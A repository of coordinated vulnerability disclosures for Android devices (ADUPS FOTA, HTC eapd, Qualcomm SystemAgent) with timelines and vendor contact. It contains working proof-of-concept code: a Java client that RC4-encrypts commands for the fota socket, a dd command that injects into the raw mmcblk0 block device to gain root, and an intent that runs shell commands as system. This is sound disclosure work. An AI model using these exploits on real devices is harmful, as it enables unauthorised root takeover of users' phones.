├── .gitignore ├── GetSuperSerial.md ├── HTCPeap.md ├── QCOMSysAgent.md └── README.md /.gitignore: -------------------------------------------------------------------------------- 1 | *~ 2 | #*# 3 | .DS_Store -------------------------------------------------------------------------------- /GetSuperSerial.md: -------------------------------------------------------------------------------- 1 | # CVEs 2 | CVE-2015-2231 3 | CVE-2015-2232 4 | 5 | ## Affected Devices (tested on) 6 | - Blu Studio 5.0c (MT6582) 7 | - Blu Vivo Air (MT6592) 8 | - Alcatel OneTouch Evolve2 (MT6582) 9 | - Likely other Blu devices 10 | - Likely other Alcatel devices 11 | - Likely other devices using MediaTek FOTA update services which is called [ADUPS](http://mg.adups.cn/adups/index.html) 12 | 13 | I have been unable to establish a proper line of communication with any of the affected vendors. Multiple emails to MediaTek emails have resulted in radio silence, BLU claims they have no security department and cannot assist. 14 | 15 | The Android Security team however has accepted the [CTS patch](https://android.googlesource.com/platform/cts/+/8a13023f463ecc0e266072863ecf23b0a559ec2f) to add an extra check for this system socket. This is very much like Jon Sawyer's checks previous which they purposefully evades, so let's see if they do it again. 16 | 17 | ## CVE-2015-2231 (user escalation to system) 18 | Blu/Mediatek/ADUPS’s OTA system uses `/system/bin/fotabinder` service and socket at `/dev/socket/fota` which is initiated by `FWUpgradeInit.rc` as follows; 19 | 20 | ``` 21 | service fotabinder /system/bin/fotabinder 22 | class main 23 | socket fota stream 600 system system 24 | ``` 25 | 26 | This script is imported inside of `init.rc`; 27 | ``` 28 | import /FWUpgradeInit.rc 29 | ``` 30 | This socket and binary is used to allow FWUpdate (package name com.adups.fota) the ability to run system uid commands over the socket. This is similar to CVE-2014-1600, however the socket only allows system uid commands to be executed and the socket is “encrypted” used RC4 (with the key always being "system") opposed to cleartext. The socket has also been changed, likely in an attempt to evade the CTS tests which specifically check for CVE-2014-1600. 31 | 32 | Using the attached POC any application which has the INTERNET permission can connect to the socket and execute a system uid command. This issue has been assigned CVE-2015-2231. 33 | 34 | ## CVE-2015-2232 (system escalation to root) 35 | After gaining system uid access, we can then gain root privileges utilizing an a misconfiguration of mounted blocks; 36 | ``` 37 | root@BLU STUDIO 5.0 C:/dev/block # ls -l /dev/block/mmcblk0 38 | brw-rw---- root system 179, 0 2015-03-09 13:41 mmcblk0 39 | ``` 40 | `mmcblk0` is the entire mounted partition, which `system` has complete read and write access to. From here we can use CVE-2015-2231 to execute a shell script as `system` to write to `mmcblk0` and cause a script to be executed as `root` on boot. This can allow the system uid to grain root and has been assigned CVE-2015-2232. 41 | 42 | ## Timeline 43 | - 2015-03-01 Discovery 44 | - 2015-03-05 Request Security Contact (BLU/Mediatek) 45 | CVEs Requested 46 | - 2015-03-06 CVEs Assigned 47 | - 2015-03-06 BLU responded "no security department available" 48 | - 2015-03-09 Contact ADUPS 49 | - 2015-03-09 Contact security@android.com 50 | - 2015-03-10 Reply from security@android.com, assigned ANDROID-19679287 51 | - 2015-05-01 Discussed vulnerability semi-publically at Qualcomm Mobile Security Summit 52 | - 2015-05-17 Test accepted by Android Security Team to CTS to look for bad socket 53 | - 2015-05-20 One last attempt to reach out to ADUPS/Mediatek 54 | - 2015-05-21 Public release of doc 55 | - 2015-05-22 MediaTek finally responds saying they where told by Google and it "should be all set" 56 | 57 | ## CVE-2015-2231 example code; 58 | ``` 59 | package diff.strazzere.blukit; 60 | 61 | import java.io.IOException; 62 | import java.io.InputStream; 63 | import java.io.OutputStream; 64 | 65 | import android.net.LocalSocket; 66 | import android.net.LocalSocketAddress; 67 | 68 | /** 69 | * Send commands to fota service and get system uid execution 70 | * 71 | * @author tim strazzere 72 | */ 73 | public class BluSocket { 74 | 75 | private byte[] buf; 76 | private int buflen; 77 | 78 | private LocalSocket mSocket; 79 | private InputStream mIn; 80 | private OutputStream mOut; 81 | 82 | public BluSocket() { 83 | buflen = 0; 84 | buf = new byte[0x400]; 85 | } 86 | 87 | public boolean connect() { 88 | mSocket = new LocalSocket(); 89 | 90 | try { 91 | mSocket.connect(new LocalSocketAddress("fota", LocalSocketAddress.Namespace.RESERVED)); 92 | mIn = mSocket.getInputStream(); 93 | mOut = mSocket.getOutputStream(); 94 | return true; 95 | } catch (IOException e) { 96 | e.printStackTrace(); 97 | } 98 | 99 | return false; 100 | } 101 | 102 | public void disconnect() { 103 | if (mSocket != null) { 104 | try { 105 | mSocket.close(); 106 | mSocket = null; 107 | } catch (IOException e) { 108 | e.printStackTrace(); 109 | } 110 | } 111 | 112 | if (mIn != null) { 113 | try { 114 | mIn.close(); 115 | mIn = null; 116 | } catch (IOException e) { 117 | e.printStackTrace(); 118 | } 119 | } 120 | 121 | if (mOut != null) { 122 | try { 123 | mOut.close(); 124 | mOut = null; 125 | } catch (IOException e) { 126 | e.printStackTrace(); 127 | } 128 | } 129 | } 130 | 131 | public int execute(String ACTION_UPDATE_REPORT) { 132 | return transaction(ACTION_UPDATE_REPORT); 133 | } 134 | 135 | public int transaction(String ACTION_UPDATE_REPORT) { 136 | if (connect()) { 137 | if (writeCommand(ACTION_UPDATE_REPORT)) { 138 | if (readReply()) { 139 | return (buf[0] & 0xFF) | ((buf[1] & 0xFF) << 8) | ((buf[2] & 0xFF) << 16) | ((buf[3] & 0xFF) << 24); 140 | } 141 | } 142 | } 143 | 144 | return -1; 145 | } 146 | 147 | public boolean writeCommand(String ACTION_UPDATE_REPORT) { 148 | byte[] data = cipher(ACTION_UPDATE_REPORT, "system").getBytes(); 149 | 150 | if ((data.length > 0) && (data.length < 1024)) { 151 | buf[0] = (byte) (data.length & 0xFF); 152 | buf[1] = (byte) ((data.length >> 8) & 0xFF); 153 | 154 | try { 155 | mOut.write(buf, 0, 2); 156 | mOut.write(data, 0, data.length); 157 | return true; 158 | } catch (Exception e) { 159 | e.printStackTrace(); 160 | } 161 | } 162 | return false; 163 | } 164 | 165 | public boolean readReply() { 166 | buflen = 0; 167 | if (readBytes(buf, 2)) { 168 | int length = (buf[0] & 0xFF) | ((buf[1] & 0xFF) << 8); 169 | if ((length > 0) && (length <= 1024)) { 170 | buflen = length; 171 | return readBytes(buf, length); 172 | } else { 173 | disconnect(); 174 | } 175 | } 176 | 177 | return false; 178 | } 179 | 180 | public boolean readBytes(byte[] ACTION_UPDATE_REPORT, int length) { 181 | try { 182 | if (length > 0) { 183 | int read = 0; 184 | int rest = length - read; 185 | int result = 0; 186 | while (read < length) { 187 | result = mIn.read(buf, read, rest); 188 | if (result < 0) { 189 | break; 190 | } 191 | read += result; 192 | } 193 | 194 | if (read == length) { 195 | return true; 196 | } 197 | } 198 | } catch (Exception e) { 199 | e.printStackTrace(); 200 | } 201 | return false; 202 | } 203 | 204 | /* 205 | * "crypto" -> RC4 with the string "system" 206 | */ 207 | public static String cipher(String ACTION_UPDATE_REPORT, String system) { 208 | String result = null; 209 | 210 | if ((ACTION_UPDATE_REPORT != null) && (system != null)) { 211 | byte[] command_bytes = ACTION_UPDATE_REPORT.getBytes(); 212 | byte[] system_bytes = system.getBytes(); 213 | byte[] array = new byte[0x100]; 214 | 215 | for (int i = 0; i < array.length; i++) { 216 | array[i] = ((byte) i); 217 | } 218 | 219 | if ((system_bytes != null) && (system_bytes.length != 0)) { 220 | int index = 0; 221 | int system_index = 0; 222 | byte tmp_byte; 223 | for (int i = 0; i < 0x100; i++) { 224 | index = (index + ((system_bytes[system_index] & 255) + (array[i] & 255))) & 255; 225 | tmp_byte = array[i]; 226 | array[i] = array[index]; 227 | array[index] = tmp_byte; 228 | system_index = (system_index + 1) % system_bytes.length; 229 | } 230 | 231 | system_bytes = array; 232 | } 233 | 234 | array = new byte[command_bytes.length]; 235 | int index = 0; 236 | int system_index = 0; 237 | byte tmp_byte; 238 | for (int i = 0; i < command_bytes.length; i++) { 239 | system_index = (system_index + 1) & 255; 240 | index = (index + (system_bytes[system_index] & 255)) & 255; 241 | tmp_byte = system_bytes[system_index]; 242 | system_bytes[system_index] = system_bytes[index]; 243 | system_bytes[index] = tmp_byte; 244 | array[i] = ((byte) (system_bytes[((system_bytes[system_index] & 255) + (system_bytes[index] & 255)) & 255] ^ command_bytes[i])); 245 | } 246 | 247 | command_bytes = array; 248 | 249 | StringBuffer buffer = new StringBuffer(command_bytes.length); 250 | for (byte command_byte : command_bytes) { 251 | buffer.append(((char) command_byte)); 252 | } 253 | 254 | result = stringToHexString(buffer.toString()); 255 | } 256 | 257 | return result; 258 | } 259 | 260 | private static String stringToHexString(String ACTION_UPDATE_REPORT) { 261 | String result = ""; 262 | for (int i = 0; i < ACTION_UPDATE_REPORT.length(); ++i) { 263 | String intermediate = Integer.toHexString(ACTION_UPDATE_REPORT.charAt(i) & 255); 264 | if (intermediate.length() == 1) { 265 | intermediate = String.valueOf('0') + intermediate; 266 | } 267 | 268 | result = String.valueOf(result) + intermediate; 269 | } 270 | 271 | return result; 272 | } 273 | } 274 | 275 | ``` 276 | 277 | ## CVE-2015-2232 example code; 278 | Using CVE-2015-2231 execute a shell script like the following; 279 | 280 | ``` 281 | #!/bin/bash 282 | dd if=/data/local/tmp/yay/inject of=/dev/block/mmcblk0 seek=252239890 bs=1 conv=notrunc 283 | ``` 284 | 285 | Which will inject “/data/local/tmp/shell.sh #” into the script `partition_permission.sh`, which is run by root on restart; 286 | 287 | ``` 288 | root@BLU STUDIO 5.0 C:/ # ls -l /system/etc/partition_permission.sh 289 | -rwxr-x--- root root 676 2014-07-28 03:12 partition_permission.sh 290 | ``` 291 | 292 | Proof of Concept 293 | ================ 294 | 295 | The POC and actual code I used for achieving root can be found at the repo [adups-get-super-serial](https://github.com/rednaga/adups-get-super-serial) (publical as of Sept. 9th, 2015) 296 | -------------------------------------------------------------------------------- /HTCPeap.md: -------------------------------------------------------------------------------- 1 | # CVEs 2 | - CVE-2015-5525 - Unsecured Unix Socket/IPC to root process for eapd 3 | - CVE-2015-5526 - Path transversal in eapd 4 | - CVE-2015-5527 - Backdoor for executing shell scripts as root 5 | 6 | ## Authors 7 | - Jon “jcase” Sawyer - jcase@cunninglogic.com 8 | - Tim “diff” Strazzere - strazz@gmail.com 9 | 10 | ## Affected Devices (tested on) 11 | - HTC Desire 310 12 | - HTC Desire 310n 13 | - HTC Desire 320 14 | - HTC V1 (only a very limited number of firmwares) 15 | - CAT S50 (untested, informally verified with user of device, hard to get hands on actual device) 16 | - Likely other HTC devices 17 | 18 | ## CVE-2015-5525 19 | `init` starts the process `/system/bin/eapd`, which runs as root. This process’s entire purpose is to run shell scripts as the root user. 20 | This process listens for input on a socket that is world readable and writable. This socket should be protected by more strict permissions, 21 | and/or a SELinux policy (and eapd likely shouldn’t exist). 22 | 23 | ``` 24 | srw-rw-rw- root system 2015-08-04 15:22 eapd 25 | ``` 26 | 27 | ## CVE-2015-5526 28 | 29 | The `eapd` process (`/system/bin/eapd`) is vulnerable to a path transversal vulnerability, when combined with CVE-2015-5525 this results in any app/user being able to execute a script as the root user. Input should be sanitized (and eapd shouldn't exist). By attaching to the `eapd` socket, which this process listens on, the user can craft a directory traversal to a file that they control. 30 | 31 | Simplified; 32 | `sprintf(path,"%s%s%s", "/data/data/com.cci.eapenhance/cache/", input, ".sh"` 33 | 34 | ``` 35 | loc_B30 36 | LDR R1, =(a_sh - 0xB3E) 37 | ADD R6, SP, #0x220+var_C4 38 | LDR R2, =(aSSS - 0xB42) 39 | MOV R0, R6 ; char * 40 | LDR R3, =(aDataDataCom_cc - 0xB46) 41 | ADD R1, PC ; a_sh ; ".sh" 42 | STR R7, [SP,#0x220+var_220] 43 | ADD R2, PC ; "%s%s%s" 44 | STR R1, [SP,#0x220+var_21C] 45 | ADD R3, PC ; "/data/data/com.cci.eapenhance/cache/" 46 | MOVS R1, #0x96 ; size_t 47 | BLX snprintf 48 | LDR R2, =(aScript_pathS - 0xB56) 49 | MOV R1, R5 50 | MOV R3, R6 51 | MOVS R0, #6 52 | ADD R2, PC ; "script_path = %s" 53 | BLX __android_log_print 54 | LDR R1, =(aR - 0xB60) 55 | MOV R0, R6 ; char * 56 | ADD R1, PC ; "r" 57 | BLX fopen 58 | MOV R9, R0 59 | CBZ R0, loc_BAA 60 | ``` 61 | 62 | The below code simply performs; 63 | `system(path)` 64 | 65 | ``` 66 | LDR R2, =(aSS - 0xB74) 67 | MOVS R1, #0x96 ; size_t 68 | LDR R3, =(aSystemBinSh - 0xB76) 69 | ADD R0, SP, #0x220+var_15C ; char * 70 | STR R6, [SP,#0x220+var_220] 71 | ADD R2, PC ; "%s %s" 72 | ADD R3, PC ; "/system/bin/sh" 73 | BLX snprintf 74 | LDR R2, =(aCmdS - 0xB84) 75 | MOV R1, R5 76 | ADD R3, SP, #0x220+var_15C 77 | MOVS R0, #6 78 | ADD R2, PC ; "cmd========================%s" 79 | BLX __android_log_print 80 | ADD R0, SP, #0x220+var_15C ; char * 81 | BLX system 82 | MOV R0, R9 ; FILE * 83 | BLX fclose 84 | MOV R0, R6 ; char * 85 | BLX remove 86 | ADD R0, SP, #0x220+var_15C ; void * 87 | MOVS R1, #0 ; int 88 | MOVS R2, #0x96 ; size_t 89 | BLX memset 90 | ``` 91 | 92 | ## CVE-2015-5527 93 | 94 | The application `/system/app/EAP_SU.apk`, package name `com.cci.eapsu`, has an unprotected Broadcast Receiver that acts a backdoor. This allows 95 | ab unprivledged user to execute shell commands as root through `eapd` without relying on the two previous CVEs. This may be exploited from an 96 | app or adb using a broadcast containing the script in an extra named 'cmd'. The broadcast receivers should be protected with a strict permission, 97 | hoever in reality EAP_SU and eapd should not exist as they are outside of the normal Andorid permission model. 98 | 99 | Vulnerable manifest; 100 | ``` 101 | 107 | 111 | 112 | 113 | 114 | 115 | 116 | 117 | 118 | ``` 119 | 120 | Vulnerable code; 121 | ``` 122 | public class CmdReceiver extends BroadcastReceiver { 123 | private final String DO_SU_CMD; 124 | static final String TAG = "EAP_SU"; 125 | private String cmd; 126 | 127 | public CmdReceiver() { 128 | super(); 129 | this.DO_SU_CMD = "com.cci.eapsu.DoSuCmd"; 130 | this.cmd = ""; 131 | } 132 | 133 | protected static boolean DoSuCmd(String arg8) { 134 | boolean v4 = false; 135 | SystemProperties.set("ctl.stop", "my_su_command"); 136 | Log.d("EAP_SU", "doCmdByDaemon - cmd = " + arg8); 137 | String CmdPath = "/data"; 138 | String CmdName = "cmd.sh"; 139 | if(PlatformFeatures.getPlatformID() == 80 || PlatformFeatures.getPlatformID() == 66) { 140 | CmdName = "command.sh"; 141 | } 142 | 143 | File fileScript = new File(CmdPath, CmdName); 144 | if(fileScript.exists()) { 145 | fileScript.delete(); 146 | } 147 | 148 | if(!FileOperations.writeStrToFile(fileScript.getAbsolutePath(), arg8, false)) { 149 | if(fileScript.exists()) { 150 | fileScript.delete(); 151 | } 152 | 153 | Log.e("EAP_SU", "Write " + CmdPath + "/" + CmdName + " script Fail!!"); 154 | } 155 | else { 156 | SystemProperties.set("ctl.start", "my_su_command"); 157 | v4 = true; 158 | } 159 | 160 | return v4; 161 | } 162 | 163 | public void onReceive(Context arg4, Intent arg5) { 164 | if(arg5.getAction().equals("com.cci.eapsu.DoSuCmd")) { 165 | this.cmd = arg5.getExtras().getString("cmd"); 166 | Log.d("EAP_SU", "onReceive cmd: " + this.cmd); 167 | CmdReceiver.DoSuCmd(this.cmd); 168 | } 169 | } 170 | } 171 | ``` 172 | -------------------------------------------------------------------------------- /QCOMSysAgent.md: -------------------------------------------------------------------------------- 1 | # CVEs 2 | - No CVEs requested / None assigned, reported directly to vendor 3 | - Issue 1: Qualcomm SystemAgent application allows unprivledged user execution of shell commands as system user 4 | - Issue 2: QSA applications allows ability for unprivledged user to set system properties. 5 | - Issue 3: QSA applications allows ability for unprivledged user to write strings as system user. 6 | - Issue 4: QSA applications allows ability for unprivledged user take a screen shot of device. 7 | - Issue 5: QSA applications allows ability for unprivledged user reboot the device. 8 | 9 | ## Authors 10 | - Jon “jcase” Sawyer - jcase@cunninglogic.com 11 | 12 | ## Affected Devices (tested on) 13 | - Accatel A564C (TCL/ALCATEL_A564C/Yaris5NA:4.4.2/KVT49L/v4FAZ-0-0:user/release-keys) 14 | - Potentially other devices with the com.qualcomm.agent package install on it 15 | 16 | ## Main (interesting) Vulnerability 17 | 18 | Only diving directly into the interesting vulnerability which is the Qualcomm SystemAgent application allowing an unprivledged user to 19 | execute any shell commands as system user. This application apparently was never meant to ship on production devices. 20 | 21 | ### Result 22 | Local privilege escalation to system user, with multiple groups running in the system_app context 23 | 24 | ### Overview 25 | 26 | The Qualcomm SystemAgent application (package name `com.qualcomm.agent`) has an unsecured (exported, no permissions required): 27 | 28 | ``` 29 | 30 | 31 | 32 | 33 | 34 | 35 | 36 | ``` 37 | 38 | The when a `startService` broadcast is sent to the `SystemAgent` using the fullagent action intent, the service executes the intent's "para" 39 | data field as a shell command. 40 | 41 | ``` 42 | Values.ACTION_FULL_AGENT = "android.system.fullagent"; 43 | 44 | public int onStartCommand(Intent intent, int flags, int startId) { 45 | // .. snip .. 46 | else if(Values.ACTION_FULL_AGENT.equals(intent.getAction())) { 47 | this.exec(intent.getStringExtra("para")); 48 | } 49 | 50 | return 1; 51 | } 52 | 53 | void exec(String para) { 54 | new Thread() { 55 | final SystemAgent this$0; 56 | final String val$para; 57 | 58 | public void run() { 59 | int v13 = 0x23; 60 | try { 61 | SystemAgent.logd(this.val$para); 62 | String[] paras = this.val$para.split(","); 63 | int i; 64 | for(i = 0; i < paras.length; ++i) { 65 | SystemAgent.logd(i + ":" + paras[i]); 66 | } 67 | 68 | Process mProcess = Runtime.getRuntime().exec(paras); 69 | mProcess.waitFor(); 70 | BufferedReader inBuffer = new BufferedReader(new InputStreamReader(mProcess.getInputStream())); 71 | String data; 72 | for(data = ""; true; data = data + s + "\n") { 73 | String s = inBuffer.readLine(); 74 | if(s == null) { 75 | break; 76 | } 77 | } 78 | 79 | SystemAgent.logd(data); 80 | int result = mProcess.exitValue(); 81 | SystemAgent.logd("ExitValue=" + result); 82 | String resultProp = paras[0] + ","; 83 | if(result >= 0 && result != 0xFF) { 84 | resultProp = data.length() > v13 ? resultProp + data.substring(0, 0x23) : resultProp + data; 85 | } 86 | 87 | AgentUtils.setSystemProperties(Values.AGENT_RESULT_PROP, resultProp); 88 | return; 89 | } 90 | catch(Exception e) { 91 | SystemAgent.logd(e); 92 | return; 93 | } 94 | } 95 | }.start(); 96 | } 97 | ``` 98 | 99 | ### Proof of concept 100 | 101 | ``` 102 | ComponentName intentComponent = new ComponentName("com.qualcomm.agent", "com.qualcomm.agent.SystemAgent"); 103 | Intent serviceIntent = new Intent ("android.system.fullagent"); 104 | serviceIntent.setComponent(intentComponent); 105 | serviceIntent.putExtra("para", "/system/bin/id"); 106 | startService(serviceIntent); 107 | ``` 108 | 109 | Result from logcat: 110 | ``` 111 | D/SystemAgent( 4109): [onCreate] RUN 112 | D/SystemAgent( 4109): [onStartCommand] 1 113 | D/SystemAgent( 4109): [access$000] /system/bin/id 114 | D/SystemAgent( 4109): [access$000] 0:/system/bin/id 115 | D/SystemAgent( 4109): [access$000] uid=1000(system) gid=1000(system) groups=1000(system),1004(input),1010(wifi),1015(sdcard_rw),1021(gps),1023(media_rw),1028(sdcard_r),2002(diag),3001(net_bt_admin),3002(net_bt),3003(inet),3004(net_raw),3005(net_admin),3009(qcom_diag),41000(u0_a31000) context=u:r:system_app:s0 116 | D/SystemAgent( 4109): [access$000] ExitValue=0 117 | ``` 118 | 119 | ### Additional related vulnerabilities in SystemAgent application 120 | 121 | More issues are found inside the method `private void doSystemActions(String para)`, which 122 | are located and accessable in the same service. This allows an unprivledged application/user to: 123 | - Set system properties 124 | - Write strings to files as system user (writeFileAgent) 125 | - Take a screen shot and save it to “/storage/sdcard1/logs/screenshot.png" 126 | - Reboot the device 127 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # disclosures 2 | 3 | ## CVEs 4 | 5 | - ["Get Super Serial" CVE-2015-2231 & CVE-2015-2232](https://github.com/rednaga/disclosures/blob/master/GetSuperSerial.md) 6 | 7 | Chain from an application with internet permissions to a system uid, then from a system uid to root. This is mainly due 8 | to an extremely weak firmware upgrade system calls "ADUPS" which has failed to have any type of response. While the two 9 | specific CVEs directly correlate to a few Blu phones, it appears to be used by many other lower-end phones. 10 | 11 | 12 | - ["HTC Peap" CVE-2015-5525, CVE-2015-5526 & CVE-2015-5527](https://github.com/rednaga/disclosures/blob/master/HTCPeap.md) 13 | 14 | Multiple ways to access a backdoor which allows an unprivledged application the ability to run root commands. Discussed 15 | at the DEFCON23 Red Naga workshop on Offensive and Defensive Android Reverse Engineering. 16 | 17 | - ["Qualcomm System Agent", No CVEs assigned](https://github.com/rednaga/disclosures/blob/master/QCOMSysAgent.md) 18 | 19 | Multiple vulnerabilities in an application that was never meant to be shipped on production devices. Discussed 20 | at the DEFCON23 Red Naga workshop on Offensive and Defensive Android Reverse Engineering. 21 | 22 | - ["Blackphone 1 modem take over", CVE-2015-6841](https://www.sentinelone.com/blog/vulnerability-in-blackphone-puts-devices-at-risk-for-takeover/) 23 | 24 | Allows any local attacker to take over the modem, inject commands, cause denial of service and other creepy things. 25 | [Vendor Post](https://www.silentcircle.com/blog/blackphone-1-vulnerability-notice/), [release notes](https://support.silentcircle.com/customer/en/portal/articles/2242250-privatos-1-1-13-release-notes?b_id=4315). 26 | 27 | - ["RESERVED", RED-2016-0029 / CVE-2016-3862]() 28 | 29 | Triaged by Google as Critical/Severe. RCE seems not possible on 4.2+ devices due to mitigations in place, 30 | however remote DOS/crash still available without interaction. More details and CVE after fix is released. 31 | 32 | - ["RESERVED", RED-2016-0030 / CVE-2016-????]() 33 | 34 | Spot reserved for arbitraty (blind) system command execution on newly (7/2016) released Android 6 device. 35 | Details and CVE listed after vendor fix and assigned. 36 | --------------------------------------------------------------------------------